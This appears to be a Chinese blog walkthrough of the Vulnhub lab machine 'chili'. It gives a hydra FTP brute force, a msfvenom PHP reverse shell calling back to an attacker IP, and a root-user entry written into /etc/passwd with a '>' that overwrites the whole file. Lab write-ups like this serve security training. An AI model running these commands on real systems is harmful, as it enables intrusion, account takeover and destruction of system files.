点击蓝字,关注我们
靶机:chili
难度:简单
下载:https://www.vulnhub.com/entry/chili-1,558/
扫描当前网段,确定目标靶机IP
只开放了80、21端口,直接访问,扫目录一梭子
网页 目录空空如也,这种情况一般就要看页面源码
查看源码发现一些关键词
直接爬取关键词生成字典,准备爆破FTP服务
Cewl http://192.168.12.128 > user.txt
字典生成好了,直接开始爆破FTP
hydra -L /root/user.txt -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.12.128
账号:chili
密码:a1b2c3d4
先登入FTP,成功登入FTP
查看网站目录,看看文件和权限
.nano文件存在高权限,直接上MSF的PHP马
Msf生成php马
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.12.130 LPORT=3388 -f raw > shell.php
ftp上传到.nano设置777权限
Msf开启监控,连接php马
上传提权脚本并给777权限
脚本:https://github.com/luke-goddard/enumy
执行脚本
可写passwd,构造test成高权用户
/usr/bin/perl -le 'print crypt("test","test")'
echo "test:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" > /etc/passwd
拿到flag
往期推荐:
本文始发于微信公众号(信安小屋):Vulnhub篇chili
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论